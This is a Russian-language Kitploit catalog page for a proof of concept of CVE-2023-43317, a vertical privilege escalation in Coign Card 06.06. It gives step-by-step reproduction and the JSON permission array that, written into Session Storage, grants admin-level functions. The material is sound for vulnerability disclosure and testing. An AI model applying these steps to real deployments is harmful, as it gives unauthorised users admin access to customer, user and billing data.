Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-43317 — Вертикальное повышение привилегий через Session Storage от Amjad Ali (CVE-2023-43317) | Kitploit
Инструменты/GitHubGitHub/amjadali-110/cve-2023-43317
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubamjadali-110/cve-2023-43317

CVE-2023-43317

Вертикальное повышение привилегий через Session Storage от Amjad Ali (CVE-2023-43317)

Репозиторий
32 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-43317

Обычный пользователь может повысить свои привилегии через параметр userPermissionsLIst в компоненте Session Storage, чтобы получить несанкционированный доступ к ресурсам и функциям уровня администратора. Это может привести к несанкционированному доступу к данным, их изменению и другим действиям, которые обычно доступны только администраторам.

  • Уязвимый продукт:- Coign Card
  • Уязвимая версия:- 06.06
  • Ссылки:- https://nvd.nist.gov/vuln/detail/CVE-2023-43317

Шаги для воспроизведения

  1. Войдите в систему с учётной записью обычного пользователя.
  2. Щёлкните правой кнопкой мыши на веб-странице и выберите «Inspect Element», чтобы открыть инструменты разработчика.
  3. В инструментах разработчика перейдите на вкладку «Application».
  4. Разверните раздел «Session Storage».
  5. В Session Storage вы можете увидеть объект «userPermissionsList», который содержит JSON-массив разрешений пользователя. Начальные разрешения для обычного пользователя выглядят так:
root@kitploit:~
[{"permissionId":1,"permissionName":"CanGetApplicants"},{"permissionId":5,"permissionName":"CanGetUsers"},{"permissionId":8,"permissionName":"CanGetApplications"},{"permissionId":9,"permissionName":"CanResendEmails"},{"permissionId":18,"permissionName":"CanGetCustomers"},{"permissionId":22,"permissionName":"CanGetUserActivity"}]
  1. Измените разрешения в Session Storage, чтобы получить доступ уровня администратора:
root@kitploit:~
[{"permissionId":1,"permissionName":"CanGetApplicants"},{"permissionId":2,"permissionName":"CanCreateApplicants"},{"permissionId":3,"permissionName":"CanUpdateApplicants"},{"permissionId":4,"permissionName":"CanManageAccounts"},{"permissionId":5,"permissionName":"CanGetUsers"},{"permissionId":6,"permissionName":"CanCreateUsers"},{"permissionId":7,"permissionName":"CanUpdateUsers"},{"permissionId":8,"permissionName":"CanGetApplications"},{"permissionId":9,"permissionName":"CanResendEmails"},{"permissionId":10,"permissionName":"CanGetDocuments"},{"permissionId":11,"permissionName":"CanUploadDocuments"},{"permissionId":12,"permissionName":"CanCreateIndividualInvitations"},{"permissionId":14,"permissionName":"CanQueryIndividualInvitations"},{"permissionId":15,"permissionName":"CanGetBulkInvitations"},{"permissionId":16,"permissionName":"CanUploadBulkInvitationsFile"},{"permissionId":17,"permissionName":"CanUpdateFormStatus"},{"permissionId":18,"permissionName":"CanGetCustomers"},{"permissionId":19,"permissionName":"CanResendInvitations"},{"permissionId":20,"permissionName":"CanResendEvaluations"},{"permissionId":21,"permissionName":"CanResendManualReviews"},{"permissionId":22,"permissionName":"CanGetUserActivity"},{"permissionId":23,"permissionName":"CanGetDeliveredDocuments"},{"permissionId":24,"permissionName":"CanGetBillingTables"},{"permissionId":25,"permissionName":"CanGetBillingTableHistoricalRecords"},{"permissionId":26,"permissionName":"CanGetBillingTableDraftUpdateRecords"},{"permissionId":27,"permissionName":"CanGetFeedBacks"},{"permissionId":28,"permissionName":"CanUpdateBillingTables"},{"permissionId":29,"permissionName":"CanUpdateUserEmail"},{"permissionId":30,"permissionName":"CanGetTemplates"},{"permissionId":31,"permissionName":"CanResendApplicationEmail"},{"permissionId":32,"permissionName":"CanDeleteUpcomingUpdates"},{"permissionId":33,"permissionName":"CanCreatePolls"},{"permissionId":34,"permissionName":"CanGetPolls"},{"permissionId":35,"permissionName":"CanUpdatePolls"},{"permissionId":36,"permissionName":"CanNotifyIndividualinvitations"},{"permissionId":37,"permissionName":"CanSendInvitationEmail"}]
  1. После изменения разрешений обновите страницу.
  2. Вы получите несанкционированный доступ к ресурсам и функциям уровня администратора.

Отчёт

https://amjadali110.medium.com/a-easy-vertical-privilege-escalation-via-session-storage-cfa9f558c94

Скачать инструмент